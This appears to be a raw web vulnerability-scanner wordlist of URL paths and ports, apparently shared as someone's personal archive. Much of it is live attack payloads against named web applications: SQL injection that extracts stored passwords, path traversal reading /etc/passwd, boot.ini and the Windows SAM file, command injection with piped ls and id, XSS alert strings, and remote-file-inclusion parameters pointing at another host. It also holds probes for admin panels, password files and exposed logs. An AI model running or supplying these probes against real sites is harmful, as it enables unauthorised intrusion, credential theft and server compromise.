/faqman/index.php?op=view&t=518">xssthins
/filemgmt/brokenfile.php?lid=17’/“%3sqlinject
/index.php?topic=te’st/sqlinject
/forum/viewtopic.php?forum=1&showtopic=1’0/sqlinject
/staticpages/index.php?page=test’test/sqlinject
/filemgmt/visit.php?lid=1’1’0/sqlinject
/filemgmt/viewcat.php?cid=’6/sqlinject
/comment.php?type=filemgmt&cid=filemgmt-1’70/sqlinject
/comment.php?mode=display&sid=filemgmt-XXX&title=sqlinject
/filemgmt/singlefile.php?lid=17’/0/sqlinject
/dcp/advertiser.php?adv_logged=1&username=1&password=qwe’sqlthings
/dcp/lostpassword.php?action=lost&[email protected]
/wordpress/index.php?cat=100)%09or%090=0%09or%09(0=1
/b2/index.php?cat=100)%09or%090=0%09or%09(0=1
/blog/index.php?cat=100)%09or%090=0%09or%09(0=1
/servlet/ContentServer?pagename=xssthings
/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/file.php
/admin/auth.php?emml_admin_path=http://somehost_with_auth_func.php
/emml_email_func.php?emml_path=http://somehost_with_class.html.mime.mail.php
/admin/auth.php?emgb_admin_path=http://somehost_with_auth_func.php
/tinymsg.php?action=2&to=../../tadaam.html%00&from=youpi1&msg=youpi2
/gallery/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/cgi-bin/click.cgi
/contacts.php?cal_dir=anotherhost_with_vars.inc_or_ prefs.inc
/convert-date.php?cal_dir=anotherhost_with_vars.inc_or_pref s.inc
_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/cpcommerce/_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/bytehoard/index.php?infolder=../../../../
/godllink/admin/admin.php
/deskpro_v1/faq.php?cat=45’
/deskpro_v1/view.php?ticketid=1’&ticket_pass=
/forum/pm_buddy_list.asp?name=A&desc=xss_things=“&code=1
/cgi-bin/cart.pl?db=’
/include/config.inc.php?lvc_include_dir=server_with__slash_ db_slashdb_mysql.inc.php
/admin/common.inc.php?basepath=anotherhost_with_lang_engl ish.php
/nfuse/asp/launch.asp
/citrix/****framexp/default/login.asp?NFuse_LogoutId=On&NFuse_MessageType=Error&NFuse_Message=xss_things
/udataobj/webgui/cgi-bin/tuxadm.exe?INIFILE=xssthings
/post_message_form.asp?mode=quote&PID=1111&FID=1&TID=11&TPN=1
/trace.axd
/http-commander/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/http-commander/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/http-commander/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/profile.php?mode=viewprofile&u=’sql_injection
/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
/cgi-bin/dose.pl?daily&somefile.txt&|ls|
/forum/register_new_user.asp?ForumID=0
/_vti_bin/_vti_aut/fp30reg.dll
/php-coolfile/action.php?action=edit&file=config.php
/phpwebfilemgr/index.php?f=../../../
/guest/insert.inc.php?path=another_host_with_data.inc.php
/gbook/insert.inc.php?path=another_host_with_data.inc.php
/guestbook/insert.inc.php?path=another_host_with_data.inc.php
/gaestebuch/insert.inc.php?path=another_host_with_data.inc.php
/ticketlogin
/phpBB2/search.php?search_id=1\
/vpasp/shopdisplayproducts.asp?cat=qwerty’
/vpasp/shopsearch.asp
/_layouts/settings.htm
/ldap/cgi-bin/ldacgi.exe?Action=**********alert(888)</script>
/shopping/shopdisplayproducts.asp?id=1&cat=xss_things
/php-nuke/admin.php?op=login&pwd=123&aid=Admin’sql_stuff
/php-nuke/modules.php?name=Surveys&pollID=a’sql_inject
/modules.php?name=Surveys&pollID=a’sql_inject
/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20>%20%69 %64`%20."&websiteurl=a&br_username=a&session_id=0&cgipath=.
/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
/sendeditfile
/runfile
/admin/config.php/edp_relative_path=host_with__admin_serverdata.php
/includes/hotnews-engine.inc.php3?config[header]=host_file_etc
/includes/hotnews-engine.inc.php?config[header]=host_file_etc
/includes/hnmain.inc.php3?config[incdir]=anotherhost_with_func.inc.php3
/includes/hnmain.inc.php3?config[incdir]=another_host_withhndefs.inc.php3
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=../cgi-bin/useradmin.pl%00.html
/cgi-bin/useradmin.pl?action=getinfo&htmlfile=|ls+-als|
/vbb/calendar.php?s=&action=edit&eventid=14_sql_injection_things
/calendar.php?s=&action=edit&eventid=14_sql_injection_things
/phpgedview/authentication_index.php?PGV_BASE_DIRECTORY=anothe r_host
/phpgedview/functions.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/config_gedcom.php?PGV_BASE_DIRECTORY=another_host
/manpage/index.php?command=/etc/resolv.conf
/indilist.php?alpha=\&surname_sublist=\
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/placelist.php?level=1&parent[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[0]=
/clippings.php?action=add&id=Blah
/gdbi.php?action=connect&username=Blah
/placelist.php?level=1_sql_things
/placelist.php?level=1&parent[0]=_sql_things
/placelist.php?level=2&parent[0]=&parent[1]=_sql_things
/timeline.php?pids=_sql_things
/dansguardian/edit.cgi?file=xxx
/photoalbum/admin/adminlogin.asp
/modules/mod_mainmenu.php
/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1_sql_things
/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqdOq&User.interface=frames&error=c:\windows\web\folder
/nsn/env.bas
/lcgi/lcgitest.nlm
/isqlplus?action=logon&username=xssthings&password=xssthings
/cgi-bin/forumsdb/intraforum_db.cgi
/gallery/init.php?HTTP_POST_VARS=xxx&GALLERY_BASEDIR=somedir
/directory/gotopage.cgi?13686+/../../../../../../etc/hosts
/directory/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/shop/gotopage.cgi?13686+/../../../../../../etc/hosts
/shop/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/more.php?id=’sql_things
/store/more.php?id=’sql_things
/shop/more.php?id=’sql_things
/_phpmyadmin/
/_phpmyadmin_/
/phpmyadmin/
/php_my_admin/
/phpmyadmin/export.php?what=../../../../../../etc/hosts%00
/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=host_with_script
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=host_with_script
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=host_with_script
/WebzEdit/done.jsp?message=’);xss_things;a=escape(’
//app/idxam.html
//app/idxas.html
//app/idxasp.html
//admin/aindex.htm
/directory/functions.php?clang=../../../../../../../../../../../../etc/hosts
/Carts/Computers/viewCart.asp?userID=2893225125722634’sql_things--&viewID=48
/resend.asp?ID=sql_things
/news_view.asp?ID=sql_things
/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20passwor d*null*99%20FROM%20xmb_members%20WHERE%20uid=1%20L IMIT%201%20/*
/xmb/member.php?action=viewpro&member=waraxe&restrict=%20f.private=-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20passwor d*null*99%20FROM%20xmb_members%20WHERE%20uid=1%20L IMIT%201%20/*
/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00
/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/acart/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/shop/category.asp?catcode=1%20union%20all%20select%20pa ss*0*0*0*0%20from%20customers%20where%20fname=admi n
/plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf*Listen 8000%0A%0DAccessLog "|../../../../../../winnt/system32/cmd.exe /c dir")
/payonline.asp
/shop/payonline.asp
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|ls|
/cgi-bin/store/__SQLUSER__
/gemitel/html/affich.php?base=_some_server_with_sp-turn.php
/html/affich.php?base=_some_server_with_sp-turn.php
/mail/src/compose.php?mailbox="script_stuff
/webmail/src/compose.php?mailbox="script_stuff
/squirrelmail/src/compose.php?mailbox="script_stuff
/main.cgi?next_file=/etc/hosts
/main.cgi?next_file=/etc/hosts
/ssi.php?a=out&type=xml&f=0)
/ipb/ssi.php?a=out&type=xml&f=0)
/board/ssi.php?a=out&type=xml&f=0)
/singapore/data/adminusers.csv
/gallery/data/adminusers.csv
/gal/data/adminusers.csv
/data/adminusers.csv
/scripts/cart32.exe/GetLatestBuilds?cart32=xssthings
/help.php?file=xss_thing
/cgi-bin/ShellExample.cgi
/fcgi-bin/php.ini
/cgi-bin/php.in
/cgi-bin/web_store.cgi?page=.html|ls|
/go.cgi?|id|
/go.cgi?artarchive=|id|
/endon/mod.php?mod=publisher&op=viewcat&cid=<b>test</b%3
/system/bin/user/p0177.php
/system/bin/user/p0184.php
/system/bin/upload/p0199.php
/system/bin/upload/p0204.php
/system/bin/upload/p0227.php
/system/bin/binbackoffice/p0104.php
/system/bin/page/p0190.php
/includes/functions/pmwh.php
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=’;’&Eid=criolabs’
/mantis/core/bug_api.php?t_core_dir=_another_host_with_relation ship_api.php
/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
/disk_c
/%2E%2E%5Csystem.log
/modules/dictionary/search.php?terme=">**********alert(1)</script>
/adminSection/index.asp?ShowMsg=(XSS)
/adminSection/ChangePassword.asp?ShowMsg=(XSS)
/adminSection/users_list.asp?ShowMsg=(XSS)
/adminSection/users_add.asp?ShowMsg=(XSS)
/adminSection/index_next.asp?
/mwadmin/index.php?real_Cookie_is_auth=1;_uId=1
/fileCopy.asp?INPUTFILE=&OUTPUTFILE=
/copyFile.asp
/yabbse/Sources/Admin.php
/cgi-bin/sitenews/sitenews.cgi?edit
/cgi-bin/sitenews.cgi?edit
/sitenews.cgi?edit
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=other_host_
//PUBLIC/ADMIN/INDEX.HTM
/include/livre_include.php
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/ajfork/inc/main.mdu
/_maincfgret.cgi
/NotifyAction.asp?action=AddType&instance=Beeper&end=end
/phplinks/index.php?show=ruaosleas
/bb_lib/checkdb.inc.php?libpach=another_host_with__more.ph p
/secure%5Clogin.aspx
/guest/AWSguest.php
/guestbook/AWSguest.php
/registry/AWSguest.php
/evoweb/?EvoCmd=console
/evo/web/?EvoCmd=console
/messageboard/Forum.asp?QuestionNumber=’+sql_stuff&Find=1&Category=1
/cms/adm_pages.php?and_/index.php_qm_inc=anotherhost_with_dot_php
/ocp-103/index.php?req_path=another_host_with_funcs_dot_php
/app_sta.stm?router_things
/cgi-bin/apexec.pl?template=/etc/hosts%%0000.html
/cphp/index.php?op=invparam_and_index_dot_php_op_include s_any_file
/scripts/slxweb.dll/getfile?type=Library&file=_any_file_tata
/dosearch.php?Name=’ OR U_Password=’db5c82346d770f48bdd8929094c0c695’/*
/portal/diag/
/jaf/index.php?show=../../../../../../../etc/hosts
/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=host_with_includes/functions_selects.php
tamamen bnim arşivdir ///edit.kimse hırsız değil; )
/Admin_files/
/DMR/
/StoreDB/
/WebShop/
/WebTrend/
/Web_store/
/webEdition/
/webedition/
/access/
/cms/
/cmsx/
/cmsx/upload.php
/cms/fileadmin/
/cms/fileadmin/log.txt
/account/
/accounting/
/administrator/
/ConsoleHelp/
/console/
/app/
/apps/
/archive/
/wi/
/wi/bin/
/system/
/system/bin/
/system/bin/upload/
/system/bin/binbackoffice/
/backoffice/
/bin/
/asp/
/demo/
/demonstration/
/atc/
/backup/
/bak/
/opt/
/opt/setupt/
/beta/
/bin/
/buy/
/buynow/
/c/
/cart/
/ccard/
/counter/
/credit/
/customers/
/userdata/
/Search
/~Account%20Name/Search
/snmpinit
/dat/
/data/
/chat/data/
/chat/data/usr/
/database/
/db/
/dbase/
/doc-html/
/docs/
/down/
/download/
/downloads/
/aspSmartUpload/
/cmsupload/
/cmsuploads/
/cms-uploads/
/cms-up/
/cmsup/
/img_upl/
/img_upload/
/images_upload/
/images_upl/
/upload-docs/
/upload-documents/
/upload-files/
/uploadfiles/
/uploadtemp/
/upload-temp/
/uploadtmp/
/upload-tmp/
/admin/dateiupload.php
/admin/dateiverwaltung.php
/dateiverwaltung.php
/dateiupload.php
/tmpupload/
/tempupload/
/tmp-upload/
/temp-upload/
/upload2.htm
/upload2.html
/upload/
/uploads/
/upload/
/uploading/
/employees/
/wartung/
/support/
/exe/
/file/
/files/
/forum/
/fpadmin/
/ftp/
/ftpfiles/
/guestbook/
/guests/
/home/
/htdocs/
/html/
/ibill/
/idea/
/ideas/
/incoming/
/info/
/install/
/installfiles/
/install-files/
/intranet/
/intra/
/jave/
/jdbc/
/lib/
/library/
/login/
/log/
/logfiles/
/mail/
/mall_log_files/
/manual/
/marketing/
/msql/
/new/
/newfiles/
/old/
/oldfiles/
/odbc/
/old/
/oracle/
/postgres/
/postgresql/
/order/
/orders/
/outgoing/
/pages/
/password/
/passwords/
/perl/
/private/
/pub/
/public/
/purchase/
/purchases/
/pw/
/register/
/registered/
/reseller/
/retail/
/root/
/sales/
/setup-files/
/setup_files/
/setup/
/shop/
/shopper/
/site/iissamples/
/software/
/source/
/src/
/srcfiles/
/sql/
/support/
/tmp/
/tmpfiles/
/temp/
/tempfiles/
/test/
/testfiles/
/tst/
/tstfiles/
/tstsite/
/testsite/
/test-cgi/
/tools/
/tree/
/updates/
/usage/
/user/
/users/
/web/
/web800fo/
/webadmin/
/board/docs/
/webboard/
/webdata/
/website/
/www/
/www-sql/
/wwwjoin/
/import/
/zipfiles/
/zip/
/zips/
/session/
/session.jsp
/session.jhtml
/session.php
/session.phps
/session.asp
/session.aspx
/session.pl
/cgi-bin/session.pl
/cgi-bin/xxxnonexistingyy.pl
/cgi-bin/xxxnonexistingyy.exe
/cgi-bin/xxxnonexistingyy.bat
/cgi-bin/xxxnonexistingyy.jsp
/session.py
/sessions
/sessions.jsp
/sessions.jhtml
/sessions.php
/sessions.phps
/sessions.asp
/sessions.aspx
/sessions.pl
/cgi-bin/sessions.pl
/sessions.py
/cgi-bin/
/cgi-local/
/cgi-win/
/cgi-home/
/cgi/
/dyn/
/dynamic/
/sbin/
/include/
/includes/
/inc/
/java/
/config/
/admin/
/_admin/
/__admin/
/Admin/
/./admin/
/administration/
/Administration/
/info/
/stat/
/stats/
/status/
/express/cache/
/usage/
/private/
/priv/
/internal/
/priv/
/shtml/
/debug.txt
/debug.log
/dbg.txt
/dbg.log
/xsql/java/demo/
/../../shadow
/remote_login.pl%20
/WebSTAR%20LOG
/index.search
/.dS_store
/webstar.log
/logs/webstar.log
/pi_admin.admin
/test.php3
/info.php3
/ptsite/news.inc
/news.inc
/objcheck.asp
/scripts/objcheck.asp
/include/sql.php
/include/sql.inc
/include/db.inc
/include/news.inc
/include/database.inc
/include/data.inc
/include/functions.inc
/inc/sql.inc
/inc/sql.inc
/inc/db.inc
/inc/database.inc
/inc/data.inc
/inc/functions.inc
/inc/news.inc
/inc/test.php
/include/test.php
/extras/quicklist.php?bn=krasl
/cgi-bin/test.php3
/cgi-bin/web2mail.cgi
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/%3f.jsp
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/index.jsp::$DATA
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/*.jsp::$DATA/
/servlet//..//../o.jsp
/wl_management_internal2/
/wl_management_internal2/wl_management
/servlet/wl_management
/servlets/wl_management
/wl_management?x=y
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/a.jsp//..//..//..//..//..//../winnt/win.ini
/ConsoleHelp/
/*.shtml/
/*.shtml/login.jsp
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/.../
/\.../
/iisadmpwd/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisadmpwd/_AuthChangeUrl
/_AuthChangeUrl
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/docs/CodeBrws.asp
/iissamples/sdk/asp/interaction/ServerVariables_JScript.asp
/iissamples/sdk/asp/interaction/ServerVariables_VBScript.asp
/iissamples/
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/_vti_bin/_vti_aut/fp30reg.dll
/global.asax
/global.asax.cs
/global.asa
/global.asa::$DATA
/global.asa+.htr
/global.asa%3f.htr
/global.asa%3f.jsp
/global.asa\
/global.asa%20.pl
/default.asp+.htr
/default.asp%3f.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/AdSamples/config/site.csc
/siteserver/publishing/viewcode.asp?source=/tata.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/Admin/knowledge/dsmgr/users/GroupManager.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/_mem_bin/auoconfig.asp
/_mem_bin/remind.asp
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/scripts/cpshost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/php/index.php
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/test-cgi.bat
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/perl/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/scripts/perl.exe
/scripts/perl
/cgi-bin/perl
/scripts/*.pl
/cgi-bin/gbadmin.cgi?action=setup
/guestbook/gbadmin.cgi?action=setup
/gbook/gbadmin.cgi?action=setup
/guest/gbadmin.cgi?action=setup
/cgi-bin/guestbook/passwd
/cgi-bin/guestbook/passwd.txt
/cgi-bin/guestbook/passwd.dat
/cgi-bin/guestbook/passwd.db
/guestbook/passwd
/guestbook/passwd.txt
/guestbook/passwd.dat
/guestbook/passwd.db
/wwwboard/passwd.txt
/files/passwd
/files/passwd.txt
/files/passwd.dat
/files/passwd.db
/files/pwd
/files/pwd.txt
/files/pwd.dat
/files/pwd.db
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/rguest.exe
/scripts/rguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/search.asp
/scripts/search.asp
/search.asp
/cgi-bin/campas
/cgi-bin/view-source
/source?v=../../../../../../../etc/hosts%00
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
/search97/s97_cgi.exe
/search/s97_cgi.exe
/search97/search97.vts
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/webadmin.ntf
/homepage.nsf
/webadmin.nsf
/statref.nsf
/setup.nsf
/setupweb.nsf
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/events4.nsf
/webadmin.nsf
/decsadm.nsf
/admin4.ntf
/admin4.nsf
/mailbox.ntf
/mailbox.nsf
/agentrunner.ntf
/agentrunner.nsf
/mailw46.nsf
/mailw46.ntf
/collect4.nsf
/collect4.ntf
/cersvr.nsf
/events4.nsf
/mab.nsf
/ntsync4.nsf
/ntsync4.ntf
/user_settings.cfg
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/env.pl
/cgi/env.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/CFDOCS/exampleapps/
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/mall_log_files/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pw/storemgr.pw
/quikstore.cfg
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/shopper.exe?display=action&template=order.log
/orders/mountain.cfg
/orders/orders.txt
/Admin_files/order.log
/merchants/admin.pw
/store/index.php?cat_id=’
/store/tmp/
/store/temp/
/store/customers/
/store/temp_customers/
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/admin.pl
/cgi-bin/admin.exe
/samples/view- source?filename=anotherone
:8080/samples/view- source?filename=anotherone
:8888/samples/view- source?filename=anotherone
:8888/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:2082/login/?user=_cmd_with_pipes_and_backticks
:4274/../../../../../WINNT/repair/sam
/login/?user=_cmd_with_pipes_and_backticks
:4080/?KerioFW
:9495/
:1984
:7273/?dellopenmanage
:8009/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:8081/
:8080/\../readme.txt
:5000/
:2301
:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
:3128/../../../../
:9090
:901
:8383
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:800/../..\
:800/C:/
:7464/
:12000
:9090///
:2301/Proxy/LoginResponse
:8888/surf/scwebusers
:8888/SimpleBar.dll/RunReport
:9090/apps/web/vs_diag.cgi?server=_XSS_
:6680/user.cgi?cmd=xssthings&utoken=
:8089/tools/ftgatedump.fts
:8089/tools/ftgatedump.fts?command=1
:8000/admin/reports/alertlist.mml
:80/admin/reports/alertlist.mml
:8025/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:9000/admin/reports/alertlist.mml
:8888/admin/reports/alertlist.mml
:85/waadmin.wa
10000:/dansguardian/edit.cgi?file=xxx
/waadmin.wa
:81/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28’XSS’%29% 3B</script>
/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28’XSS’%29% 3B</script>
8443:/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/frontend/x/cpanelpro/ignorelist.html?account=">**********alert(’Vulnerable’)</script>
/frontend/x/cpanelpro/showlog.html?account=**********alert(’Vulnerable’) </script>
/frontend/x/sql/repairdb.html?db=**********alert(’Vulnerable’)</script>
/frontend/x/ftp/doaddftp.html?login=">**********alert(’Vulnerable’)</script>
/tools/ftgatedump.fts
/tools/ftgatedump.fts?command=1
/adsamples/config/site.csc
/iissamples/exair/HowItWorks/CodeBrws.asp
/samples/Search/queryhit.htm
/iissamples/sdk/asp/docs/codebrws.asp
/AdvWorks/equipment/catalog_type.asp
/scripts/repost.asp
/scripts/upload.asp
/scripts/uploadx.asp
/cgi-bin/upload_pdf.exe
/cgi-bin/upload_pic.exe
/cgi-bin/upload.exe
/scripts/upload.exe
/scripts/cgi-bin/upload.exe
/scripts/uploadn.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/rwwwshell.pl
/~/
/~root/
/~admin/
/~nobOdy/
/~www/
/~wwwrun/
/~bin/
/~guest/
/~log/
/~logs/
/~lp/
/~named/
/~test/
/~tmp/
/cgi-bin/imagemap.exe
/../../../../config.sys
/../webserver.ini
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst.bat
/cgi-bin/tst2.bat
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat
/cgi-bin/get32.exe
/cgi-bin/tst.bat
/cgi-bin/alibaba.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
/WEB-INF./web.xml
/WEB-INF/web.xml
/signon?admin=admin&maybe_tivoli
:8000//
:8000//welcome.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
:8500/CFIDE/probe.cfm
